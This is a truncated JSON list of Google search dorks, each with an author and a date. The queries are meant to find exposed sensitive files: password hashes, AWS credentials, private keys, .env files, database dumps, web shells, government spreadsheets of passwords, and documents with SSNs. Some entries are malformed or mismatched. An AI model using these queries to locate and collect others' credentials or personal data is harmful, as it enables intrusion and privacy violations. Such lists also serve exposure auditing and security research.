"description": "# Google Dork: intitle:\"index of\" instagram-api\r\n# Files Containing Juicy Info\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" zoom-api", "description": "# Google Dork: intitle:\"index of\" zoom-api\r\n# Files Containing Juicy Info\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "=?UTF-8?Q?intitle:\"Index_of=E2=80=9D_user=5Fcarts_OR_user_=5Fcart.?=", "description": "# Google Dork: intitle:\"Index of\u201d user_carts OR user _cart.\r\n# Files Containing Juicy Info\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"Index of\" etc/shadow", "description": "# Google Dork: intitle:\"Index of\u201d etc/shadow\r\n# Files Containing Juicy Info\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"Index of\" people.1st", "description": "# Google Dork: intitle:\"Index of\u201d people.1st\r\n# Files Containing Juicy Info\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "service._vti_pvt.index", "description": "# Google Dork: service._vti_pvt.index\r\n# Files Containing Juicy Info\r\n# Date:15/06/2022\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "=?UTF-8?Q?=E2=80=9CIndex_of_/backup=E2=80=9D?=", "description": "# Google Dork: \u201cIndex of /backup\u201d\r\n# Files Containing Juicy Info\r\n# Date:06/15/2022\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "# Description: site:gov.in filetype:xlsx \"password\"", "description": "# Description: site:gov.in filetype:xlsx \"password\"\r\n# Files Containing Juicy Info\r\n# Author : Mangesh Pandhare\r\n# Date : 12/01/2022\r\n# Sensitive directories of SSO id's and passwords"}, {"dork": "site:gov.* intitle:\"index of\" *.doc", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.doc\r\n# Files Containing Juicy Info\r\n# Date:06/12/2021\r\n# Exploit Author: NAHID"}, {"dork": "site:gov intitle:\"index of\" *.data", "description": "# Google Dork: site:gov intitle:\"index of\" *.data\r\n# Files Containing Juicy Info\r\n# Date:06/12/2021\r\n# Exploit Author: NAHID\r\n\r\n\r\nProof Of Concept:"}, {"dork": "intitle:\"index of\" .ovpn", "description": "# Google Dork: intitle:\"index of\" .ovpn\r\n# Files Containing Juicy Info\r\n# Date: 06/11/2021\r\n# Dork Author: Chandan Sharma"}, {"dork": "site:gov.* intitle:\"index of\" *.pptx", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.pptx\r\n# Files Containing Juicy Info\r\n# Date:06/12/2021\r\n# Exploit Author: NAHID"}, {"dork": "site:org.* intitle:\"index of\" * resources", "description": "# Google Dork: site:org.* intitle:\"index of\" * resources\r\n# Files Containing Juicy Info\r\n# Date: 06/12/2021\r\n# Exploit Author: NAHID"}, {"dork": "site:gov.* intitle:\"index of\" *.xls", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.xls\r\n# Files Containing Juicy Info\r\n# Date:06/12/2021\r\n# Exploit Author: NAHID"}, {"dork": "intext:\"SQL\" && \"DB\" inurl:\"/runtime/log/\"", "description": "# Google Dork: intext:\"SQL\" && \"DB\" inurl:\"/runtime/log/\"\r\n# Files containing juicy info.\r\n# Date: 08/12/2021\r\n# Exploit Author: Vitor guaxi"}, {"dork": "intitle:\" index of \"/order/status\"", "description": "# Google Dork: intitle:\" index of \"/order/status\"\r\n# Files Containing Juicy Info\r\n# Date: 08/12/2021\r\n# Exploit Author: S Rahul"}, {"dork": "intitle:\"index of\" \"wp-upload\"", "description": "# Google Dork: intitle:\"index of\" \"wp-upload\"\r\n# Files Containing Juicy Info\r\n# Date: 10/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" filetype:sql", "description": "# Google Dork: intitle:\"index of\" filetype:sql\r\n# Files Containing Juicy Info\r\n# Date: 15/12/2021\r\n# Exploit Author: Ract Hack"}, {"dork": "intitle:\"index of\" \" *config.php \"", "description": "# Google Dork: intitle:\"index of\" \" *config.php \"\r\n# Files Containing Juicy Info\r\n# Date: 16/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" admin.php \"", "description": "# Google Dork: intitle:\"index of\" \" admin.php \"\r\n# Files Containing Juicy Info\r\n# Date:16/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:index of /backup private", "description": "#Google Dork: intitle:index of /backup private\r\n#Files containing Juicy Info\r\n#Date: 19/12/2021\r\n#Exploit Author: Anshika Bangar"}, {"dork": "intitle:\"index of\" \" index.php?id= \"", "description": "# Google Dork: intitle:\"index of\" \" index.php?id= \"\r\n# Files Containing Juicy Info\r\n# Date:16/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" wp-includes \"", "description": "# Google Dork: intitle:\"index of\" \" wp-includes \"\r\n# Files Containing Juicy Info\r\n# Date:16/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "inurl:.com index of apks", "description": "# Google Dork: inurl:.com index of movies\r\n# Pages Containing lot of Juicy Info\r\n# Date: 18 December 2021\r\n# Exploit Author: Ved Kolambkar"}, {"dork": "intitle:index of \"aws/credentials\"", "description": "# Google Dork: intitle:index of \"aws/credentials\"\r\n# Files Containing Juicy Info\r\n# Date: 20/12/2021\r\n# Exploit Author: Yuliia Danylovych"}, {"dork": "inurl:wp-content/plugins/reflex-gallery/", "description": "# Google Dork: inurl:wp-content/plugins/reflex-gallery/\r\n# Files Containing Juicy Info\r\n# Date: 21/12/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:com.* intitle:\"index of\" *.admin", "description": "# Google Dork: site:com.* intitle:\"index of\" *.admin\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:com.* intitle:\"index of\" *.admin.password", "description": "# Google Dork:site:com.* intitle:\"index of\" *.admin.password\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "index of \"fileadmin/php\"", "description": "# Google Dork: \"index of\" \"fileadmin/php\"\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "intitle:\"index of\" \"admin-shell\"", "description": "# Google Dork: intitle:\"index of\" \"admin-shell\"\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:gov.* intitle:\"index of\" *.php", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.php\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:gov.* intitle:\"index of\" *.shell", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.shell\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:com.* intitle:\"index of\" *shell.php", "description": "# Google Dork: site:com.* intitle:\"index of\" *shell.php\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:gov.* intitle:\"index of\" *.db", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.db\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:com.* intitle:\"index of\" *.db", "description": "# Google Dork: site:com.* intitle:\"index of\" *.db\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:com.* intitle:\"index of\" *.sql", "description": "# Google Dork: site:com.* intitle:\"index of\" *.sql\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:.edu intext:\"index of\" \"shell\"", "description": "# Google Dork: site:.edu intext:\"index of\" \"shell\"\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "\"index of\" :.py", "description": "# Google Dork: \"index of\" :.py\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "\"index of\" :.env", "description": "# Google Dork: \"index of\" :.env\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "\"index of\" filetype:env", "description": "# Google Dork: \"index of\" filetype:env\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "\"index of\" filetype:sql", "description": "# Google Dork: \"index of\" filetype:sql\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "\"index of\" filetype:db", "description": "# Google Dork: \"index of\" filetype:db\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "inurl:*org intitle:\"index of\" \"docker-compose\"", "description": "# Google Dork: inurl:*org intitle:\"index of\" \"docker-compose\"\r\n# Files Containing Juicy Info\r\n# Date:16/06/2022\r\n# Exploit Author: Hrishikesh Patra"}, {"dork": "intext:\"/webdynpro/resources/sap.com/\"", "description": "# Google Dork: intext:\"/webdynpro/resources/sap.com/\"\r\n# Files Containing Juicy Info\r\n# Date:16/06/2022\r\n# Exploit Author: Leonardo Venegas"}, {"dork": "intitle:\"index of\" \".env\" OR \"pass\"", "description": "# Google Dork: intitle:\"index of\" \".env\" OR \"pass\"\r\n# Files Containing Juicy Info\r\n# Date:16/06/2022\r\n# Exploit Author: Leonardo Venegas"}, {"dork": "ext:java intext:\"import org.apache.logging.log4j.Logger;\"", "description": "# Google Dork: ext:java intext:\"import org.apache.logging.log4j.Logger;\"\r\n# Files Containing Juicy Info\r\n# Date:16/06/2022\r\n# Exploit Author: Pranav Gajjar"}, {"dork": "intitle:\"index of\" \"java.log\" | \"java.logs\"", "description": "# Google Dork: intitle:\"index of\" \"java.log\" | \"java.logs\"\r\n# Files Containing Juicy Info\r\n# Date: 26/01/2022\r\n# Exploit Author: Mridupawan Bordoloi"}, {"dork": "intitle:index of ./jira-software", "description": "# Description : intitle:index of ./jira-software\r\n# Files Containing Juicy Info\r\n# Date: 28/01/2022\r\n# Exploit Author: Sonu Chaudhary\r\n# This google dork help to find the server that is using Jira-software"}, {"dork": "intext:\"token\" filetype:log \"authenticate\"", "description": "# Google Dork: intext:\"token\" filetype:log \"authenticate\"\r\n# Files Containing Juicy Info\r\n# Date: 04/02/2022\r\n# Exploit Author: Priyanka Iyer"}, {"dork": "intitle:\"index of\" \"printenv.pl", "description": "# Google Dork: intitle:\"index of\" google-api-php-client\r\n# Files Containing Juicy Info\r\n# Date: 05/02/2022\r\n# Exploit Author: Danish Eqbal"}, {"dork": "intitle:\"login\" intext:\"authorized users only\"", "description": "# Google Dork: intitle:\"login\" intext:\"authorized users only\"\r\n# Files Containing Juicy Info\r\n# Date: 24/02/2022\r\n# Exploit Author: Sumant Arora"}, {"dork": "inurl: document/d intext: ssn", "description": "# Google Dork: inurl: document/d intext: ssn\r\n# Files Containing Juicy Info\r\n# Date: 6/2/2022\r\n# Exploit Author: Christian Galvan\r\n# An attacker may be able to discover sensitive files which contain Name, SSN, and other banking information"}, {"dork": "inurl:gitlab \"AWS_SECRET_KEY\"", "description": "# Google Dork: intext: inurl: gitlab \"AWS_SECRET_KEY\"\r\n# Files Containing Juicy Info\r\n# Date: 6/16/2022\r\n# Exploit Author: Christian Galvan"}, {"dork": "inurl:/_vti_bin/ ext:asmx", "description": "# Google Dork: inurl:/_vti_bin/ ext:asmx\r\n# Files Containing Juicy Info\r\n# Date:17/06/2022\r\n# Exploit Author: Zayed AlJaberi"}, {"dork": "inurl:/_layouts \"[To Parent Directory]\"", "description": "# Google Dork: inurl:/_layouts \"[To Parent Directory]\"\r\n# Files Containing Juicy Info\r\n# Date:17/06/2022\r\n# Exploit Author: Zayed AlJaberi"}, {"dork": "intitle:\"ManageEngine Desktop Central 10\" AND (inurl:configurations OR inurl:authorization)", "description": "# Google Dork: intitle:\"ManageEngine Desktop Central 10\" AND (inurl:configurations OR inurl:authorization)\r\n# Files Containing Juicy Info\r\n# Date:17/06/2022\r\n# Exploit Author: Zayed AlJaberi"}, {"dork": "site:.com intitle:\"index of\" /payments.txt", "description": "# Google Dork: site:.com intitle:\"index of\" /payments.txt\r\n# Files Containing Juicy Info\r\n# Date: 19/06/2022\r\n# Exploit Author: Chirag Lundwani"}, {"dork": "intitle:index of \"error_log\"", "description": "# Google Dork: intitle:index of \"error_log\"\r\n# Files Containing Juicy Info\r\n# Date: 19/06/202\r\n# Exploit Author: Mohit veer Kondaveti"}, {"dork": "site:.com intitle:\"index of\" /paypal", "description": "# Google Dork: site:.com intitle:\"index of\" /paypal\r\n# Files Containing Juicy Info\r\n# Date: 19/06/2022\r\n# Exploit Author: Chirag Lundwani"}, {"dork": "site:cloudfront.net inurl:d", "description": "# Google Dork: site:cloudfront.net inurl:d\r\n# Files Containing Juicy Info\r\n# Date: 19/06/2022\r\n# Author: Juan Christian\r\n# Description: discover AWS CloudFront endpoints."}, {"dork": "site:amazonaws.com inurl:elb.amazonaws.com", "description": "# Google Dork: site:amazonaws.com inurl:elb.amazonaws.com\r\n# Files Containing Juicy Info\r\n# Date: 19/06/2022\r\n# Author: Juan Christian\r\n# Description: discover AWS Elastic Load Balancer (ELB) endpoints."}, {"dork": "intitle:\"index of \"docker-compose.yml\"", "description": "# Google Dork: intitle:\"index of \"docker-compose.yml\"\r\n# Files Containing Juicy Info\r\n# Date:20/06/2022\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"index of\" \"keystore.jks\"", "description": "# Google Dork: intitle:\"index of\" \"keystore.jks\"\r\n# Files Containing Juicy Info\r\n# Date:22/06/2022\r\n# Exploit Author: Simone Gasparato"}, {"dork": "site:*.com \"index of\" error_logs", "description": "# Google Dork: site:*.com \"index of\" error_logs\r\n# Files Containing Juicy Info\r\n# Date:22/06/2022\r\n# Exploit Author: Chirag Lundwani"}, {"dork": "site:.com intitle:\"index of\" /ipa", "description": "# Google Dork: site:.com intitle:\"index of\" /ipa\r\n# Files Containing Juicy Info\r\n# Date:22/06/2022\r\n# Exploit Author: Simone Gasparato"}, {"dork": "Inquiry about Search Results for intitle:\"index.of\" *S3", "description": "# Google Dork: intitle:\"index.of\" *S3\r\n# Files Containing Juicy Info\r\n# Date:07/03/2023\r\n# Exploit Author: Ritesh Sahu"}, {"dork": "intitle:\"index of\" aws/", "description": "# Google Dork: intitle:\"index of\" aws/\r\n# Files Containing Juicy Info\r\n# Date: 6/22/2022\r\n# Exploit Author: Christian Galvan"}, {"dork": "intitle:\"index of\" \"catalina.out\"", "description": "# Google Dork: intitle:\"index of\" \"catalina.out\"\r\n# Files Containing Juicy Info\r\n# Date:23/06/2022\r\n# Exploit Author: Matteo Canato"}, {"dork": "intitle:\"index of\" include/", "description": "# Google Dork: intitle:\"index of\" include/\r\n# Files Containing Juicy Info\r\n# Date: 6/24/2022\r\n# Exploit Author: Rejul Raghu"}, {"dork": "intitle:\"index of\" /gscloud", "description": "# Google Dork: intitle:\"index of\" /gscloud\r\n# Files Containing Juicy Info\r\n# Date:24/06/2022\r\n# Exploit Author: Christian Galvan"}, {"dork": "intitle:\"index of\" (\"passenger.*.log\" | \"passenger.log\" | | \"production.log\" )", "description": "# Google Dork: intitle:\"index of\" (\"passenger.*.log\" | \"passenger.log\" | |\"production.log\" )\r\n# Files Containing Juicy Info\r\n# Date: 24/06/2022\r\n# Exploit Author: Matteo Canato"}, {"dork": "index of /wp-admin.zip", "description": "# Google Dork: index of /wp-admin.zip\r\n# Files Containing Juicy Info\r\n# Date:24/06/2022\r\n# Exploit Author: Christian Galvan"}, {"dork": "intitle:\"index of\" \"private_key.pem\"", "description": "# Google Dork: *intitle:\"index of\" \"private_key.pem\"*\r\n#* Files Containing Juicy Info*\r\n# Date: 6/2/2022\r\n# Exploit Author: Hemdeep Gamit"}, {"dork": "intitle:\"Index of /\" inurl:(resume|cv)", "description": "# Google Dork: intitle:\"Index of /\" inurl:(resume|cv)\r\n# Files Containing Juicy Info\r\n# Date: 27/06/2022\r\n# Exploit Author: Sandesh Ajgekar"}, {"dork": "intitle:\"index of \"cloud-config.yml\"", "description": "# Google Dork: intitle:\"index of \"cloud-config.yml\"\r\n# Files Containing Juicy Info\r\n# Date: 28/06/2022\r\n# Exploit Author: Suman Das"}, {"dork": "intitle: index of \"awstats\"", "description": "# Google Dork: intitle: index of \"awstats\"\r\n# Files Containing Juicy Info\r\n# Date:04/07/2022\r\n# Exploit Author: luis De la Rosa"}, {"dork": "intitle:\"index of\" \"db.py\"", "description": "# Google Dork: intitle:\"index of\" \"db.py\"\r\n# Files Containing Juicy Info\r\n# Date: 06/07/2022\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "Re: intext:\"index of /\" \"server at\"", "description": "Google Dork: intext:\"index of /\" \"server at\"\r\n# Files Containing Juicy Info\r\n# Date:15/07/2022\r\n# Exploit Author: Shehzad Soni"}, {"dork": "inurl:s3.amazonaws.com intitle:\"AWS S3 Explorer\"", "description": "# Google Dork: inurl:s3.amazonaws.com intitle:\"AWS S3 Explorer\"\r\n# Files Containing Juicy Info\r\n# Date: 15/07/2022\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "inurl:/admin ext:config", "description": "Google Dork: inurl:/admin ext:config\r\n# Files Containing Juicy Info\r\n# Date:18/07/2022\r\n# Exploit Author: Ranjeet Jaiswal"}, {"dork": "index of:\"backtrack\" \"hack\" ext:php", "description": "Google Dork: index of:\"backtrack\" \"hack\" ext:php\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"index of\" \"cookies\" \"php\"", "description": "# Google Dork: intitle:\"index of\" \"cookies\" \"php\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\" TROJANS\" Analysis Report", "description": "# Google Dork: intitle:\" TROJANS\" Analysis Report\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"bugs\" Analysis Report", "description": "# Google Dork: intitle:\"bugs\" Analysis Report\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"index of\" \"httpclient\" \"login\"", "description": "# Google Dork: intext:\"index of\" \"httpclient\" \"login\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"sign up\" \"**\" filetype:php", "description": "# Google Dork: intext:\"sign up\" \"**\" filetype:php\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"index of\" \"repository\"", "description": "# Google Dork: intext:\"index of\" \"repository\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"index of\" \"transaction\"", "description": "# Google Dork: intext:\"index of\" \"transaction\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"index of\" \".html\"", "description": "# Google Dork: intext:\"index of\" \".html\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"index of\" \"phonepe\" \"wp-content\"", "description": "# Google Dork: intext:\"index of\" \"phonepe\" \"wp-content\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"index of smtp\"", "description": "# Google Dork: intitle:\"index of smtp\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext: \"admin\" \"subscribe\" filetype:php", "description": "# Google Dork: intext: \"admin\" \"subscribe\" filetype:php\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"index of\" \"ipaddress\"", "description": "# Google Dork: intext:\"index of\" \"ipaddress\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"index of /\" intext:\".env\"", "description": "# Google Dork: intitle:\"index of /\" intext:\".env\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: cybersploit"}, {"dork": "intitle:\"index of\" \"cron.sh\"", "description": "# Google Dork: intitle:\"index of\" \"cron.sh\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Yashwant Shastri"}, {"dork": "Sensitive Dork Exposing Uploads and Transcation details", "description": "# Google Dork: intext:\"index of\" \"upi\" \"wp-content\"\r\n# Files Containing Juicy Info\r\n# Date:27/07/2022\r\n# Exploit Author: Chaitanya Redteam"}, {"dork": "intitle:\"index of\" \"setup.sh\"", "description": "# Google Dork: intitle:\"index of\" \"setup.sh\"\r\n# Files Containing Juicy Info\r\n# Date:27/07/2022\r\n# Exploit Author: Yashwant Shastri"}, {"dork": "intitle:\"index of\" \"after.sh\"", "description": "# Google Dork: intitle:\"index of\" \"after.sh\"\r\n# Files Containing Juicy Info\r\n# Date:27/07/2022\r\n# Exploit Author: Yashwant Shastri"}, {"dork": "intitle:\"index of\" \"*db.sh\"", "description": "# Google Dork: intitle:\"index of\" \"*db.sh\"\r\n# Files Containing Juicy Info\r\n# Date:27/07/2022\r\n# Exploit Author: Yashwant Shastri"}, {"dork": "intitle:\"index of\" \"configure.sh\"", "description": "# Google Dork: intitle:\"index of\" \"configure.sh\"\r\n# Files Containing Juicy Info\r\n# Date:27/07/2022\r\n# Exploit Author: Yashwant Shastri"}, {"dork": "intitle:\"index of\" \"deploy.sh\"", "description": "# Google Dork: intitle:\"index of\" \"deploy.sh\"\r\n# Files Containing Juicy Info\r\n# Date:27/07/2022\r\n# Exploit Author: Yashwant Shastri"}, {"dork": "intitle:\"index of\" \"release.sh\"", "description": "#Google dork : intitle:\"index of\" \"release.sh\"\r\n#Files Containing Juicy Info\r\n#Date: 28/07/2022\r\n#Exploit Author : Amit Kumar\r\n\r\nThis dork shows information about configuration services on server."}, {"dork": "intitle:\"index of\" intext:\"Apache/2.2.3\"", "description": "# Google Dork: intitle:\"index of\" intext:\"Apache/2.2.3\"\r\n# Files Containing Juicy Info\r\n# Date:16/08/2022\r\n# Exploit Author: Wagner Emmanoel de Farias"}, {"dork": "inurl: /wp-includes/uploads", "description": "# Google Dork: inurl: /wp-includes/uploads\r\n# Files Containing Juicy Info\r\n# Date:16/08/2022\r\n# Exploit Author: Rajdip Chavan"}, {"dork": "intitle: \"index of\" intext: human resources", "description": "# Google dork : intitle: \"index of\" intext: human resources\r\n# Category: Files containing Juicy info\r\n# Date: 17/08/2022\r\n# Exploit Author: Mark Ivan David"}, {"dork": "intitle:\"index of\"|\"access_token.json\"", "description": "# Google Dork: intitle:\"index of\"|\"access_token.json\"\r\n# Files Containing Juicy Info\r\n# Date:17/08/2022\r\n# Exploit Author: Leonardo Venegas"}, {"dork": "filetype:reg [HKEY_USERSDEFAULT]", "description": "# Google Dork: filetype:reg [HKEY_USERS\\DEFAULT]n\r\n# Files Containing Juicy Info\r\n# Date:17/08/2022\r\n# Exploit Author: Leonardo Venegas"}, {"dork": "inurl:/sym404/root", "description": "# Google Dork: inurl:/sym404/root\r\n# Files Containing Juicy Info\r\n# Date:18/08/2022\r\n# Exploit Author: Numen Blog"}, {"dork": "intext:\"index of\" \".sql\"", "description": "# Google Dork: intext:\"index of\" \".sql\"\r\n# Files Containing Juicy Info\r\n# Date:19/09/2022\r\n# Exploit Author: Gopalsamy Rajendran"}, {"dork": "intitle:\"index of\" inurl:superadmin", "description": "# Google Dork: intitle:\"index of\" inurl:superadmin\r\n# Files Containing Juicy Info\r\n# Date:19/09/2022\r\n# Exploit Author: Mahedi Hassan"}, {"dork": "intitle:\"index of\" inurl:SUID", "description": "# Google Dork: intitle:\"index of\" inurl:SUID\r\n# Files Containing Juicy Info\r\n# Date:19/09/2022\r\n# Exploit Author: Mahedi Hassan"}, {"dork": "intitle:\"IIS Windows Server\"", "description": "# Google Dork: intitle:\"IIS Windows Server\"\r\n# Files Containing Juicy Info\r\n# Date:19/09/2022\r\n# Exploit Author: HackerFrenzy"}, {"dork": "intitle:\"WAMPSERVER Homepage\"", "description": "# Google Dork: intitle:\"WAMPSERVER Homepage\"\r\n# Files Containing Juicy Info\r\n# Date:19/09/2022\r\n# Exploit Author: HackerFrenzy"}, {"dork": "intitle:\"index of\" intext:\"Apache/2.2.3\"", "description": "# Google Dork: intitle:\"index of\" intext:\"Apache/2.2.3\"\r\n# Files Containing Juicy Info\r\n# Date:19/09/2022\r\n# Exploit Author: Wagner Farias"}, {"dork": "inurl: json beautifier online", "description": "# Google Dork: inurl: json beautifier online\r\n# Files Containing Juicy Info\r\n# Date:19/09/2022\r\n# Exploit Author: Nyein Chan Aung"}, {"dork": "inurl index.php id= site.bd", "description": "# Google Dork: inurl index.php id= site.bd\r\n# Files Containing Juicy Info\r\n# Date:31/01/2023\r\n# Exploit Author: Insha Ahsan Raj"}, {"dork": "intitle:\"index of /database/migrations\"", "description": "# Google Dork: intitle:\"index of /database/migrations\"\r\n# Files Containing Juicy Info\r\n# Date:31/01/2023\r\n# Exploit Author: Shuvrosayar Das"}, {"dork": "intitle:\"Index of /webcam/\"", "description": "# Google Dork: intitle:\"Index of /webcam/\"\r\n# Files Containing Juicy Info\r\n# Date:31/01/2023\r\n# Exploit Author: Shuvrosayar Das"}, {"dork": "inurl: administrator/components/com_admin/sql/updates/mysql/", "description": "#Google dork : inurl: administrator/components/com_admin/sql/updates/mysql/\r\n#Category: Files containing Juicy info\r\n#Date: October 08 2022\r\n#Exploit Author: Mark Ivan David"}, {"dork": "inurl: administrator/components/com_admin/sql/updates/sqlazure", "description": "#Google dork : inurl:\r\nadministrator/components/com_admin/sql/updates/sqlazure\r\n#Category: Files containing Juicy info\r\n#Date: 2/1/2023\r\n#Exploit Author: Mark Ivan David"}, {"dork": "inurl: administrator/components", "description": "#Google dork : inurl: administrator/components\r\n#Category: Files containing Juicy info\r\n#Date: 2/1/2023\r\n#Exploit Author: Mark Ivan David"}, {"dork": "inurl: wp-content/plugin/404-redirection-manager", "description": "# Google Dork: inurl: wp-content/plugin/404-redirection-manager\r\n# Files Containing Juicy Info\r\n# Date:09/02/2023\r\n# Exploit Author: Rutvik Jaini"}, {"dork": "site:investor.*.* AND inurl:home/default.aspx", "description": "# Google Dork: site:investor.*.* AND inurl:home/default.aspx\r\n# Files Containing Juicy Info\r\n# Date: 12/10/2022\r\n# Exploit Author: Salah Eddine Louffidi"}, {"dork": "intitle:\"Oracle WebLogic Server\"", "description": "# Google Dork: intitle:\"Oracle WebLogic Server\"\r\n# Files Containing Juicy Info\r\n# Date:06/02/2023\r\n# Exploit Author: Eve Cohen"}, {"dork": "intext:\"index of\" \".git\"", "description": "# Google Dork: intext:\"index of\" \".git\"\r\n# Files Containing Juicy Info\r\n# Date:07/02/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intext:\"index of\" \"phpinfo\"", "description": "# Google Dork: intext:\"index of\" \"phpinfo\"\r\n# Files Containing Juicy Info\r\n# Date:07/02/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intext:\"index of\" \"xmlrpc.php\"", "description": "# Google Dork: intext:\"index of\" \"xmlrpc.php\"\r\n# Files Containing Juicy Info\r\n# Date:07/02/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intext:\"index of\" \"phpMyAdmin\"", "description": "# Google Dork: intext:\"index of\" \"phpMyAdmin\"\r\n# Files Containing Juicy Info\r\n# Date:07/02/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intitle:BioTime AND intext:ZKTeco Security LLC", "description": "# Google Dork: intitle:BioTime AND intext:ZKTeco Security LLC\r\n# Files Containing Juicy Info\r\n# Date:09/02/2023\r\n# Exploit Author: Robot Shell"}, {"dork": "inurl: wp-content/plugin/8-degree-notification-bar", "description": "# Google Dork: inurl: wp-content/plugin/8-degree-notification-bar\r\n# Files Containing Juicy Info\r\n# Date:09/02/2023\r\n# Exploit Author: Rutvik Jaini"}, {"dork": "intitle: index of /secrets/", "description": "# Google Dork: intitle: index of /secrets/\r\n# Files Containing Juicy Info\r\n# Date:13/02/2023\r\n# Exploit Author: Bappe Sarker"}, {"dork": "# Google Dork: intitle:\"index of\" \"admin\" \"cgi-bin\"", "description": "# Google Dork: intitle:\"index of\" \"admin\" \"cgi-bin\"\r\n# Files Containing Juicy Info\r\n# Date: 2/12/2022\r\n# Exploit Author: Umandon Ardaw"}, {"dork": "intext:\"index of\" \"backuop/*.sql\"", "description": "# Google Dork: intext:\"index of\" \"backuop/*.sql\"\r\n# Files Containing Juicy Info\r\n# Date:15/02/2023\r\n# Exploit Author: Ahmad Kataranjee"}, {"dork": "intitle:index of \"wc.db\"", "description": "# Google Dork: intitle:index of \"wc.db\"\r\n# Files Containing Juicy Info\r\n# Date:15/02/2023\r\n# Exploit Author: Pradeep A"}, {"dork": "inurl:\"/wp-content/plugins/imagemagick-engine/\"", "description": "# Google Dork: inurl:\"/wp-content/plugins/imagemagick-engine/\"\r\n# Files Containing Juicy Info\r\n# 